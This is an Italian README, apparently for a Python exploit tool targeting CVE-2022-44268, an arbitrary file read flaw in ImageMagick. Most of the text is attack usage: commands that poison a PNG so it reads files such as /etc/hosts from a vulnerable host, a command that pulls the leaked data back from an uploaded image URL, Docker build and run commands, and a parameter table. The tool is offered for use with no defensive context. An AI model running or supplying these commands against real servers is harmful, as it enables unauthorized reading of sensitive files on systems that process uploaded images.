
Exploit basato su Python per CVE-2022-44268, una vulnerabilità di lettura arbitraria di file in ImageMagick. Avvelena le immagini PNG per leggere file sensibili da host vulnerabili tramite upload web.
CVE-2022-44268 ImageMagick Lettura Arbitraria di File
Avvelena l'immagine ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
Verifica se l'exploit ha avuto successo 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Compila
docker build -t cve-2022-44268 .
Esegui
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parametro | Descrizione | Tipo |
|---|---|---|
| --url | L'URL dell'immagine PNG caricata | String |
| --image | File PNG di input | File |
| --output | File PNG di output | File |
| --file-to-read | File da leggere dall'host vulnerabile | String |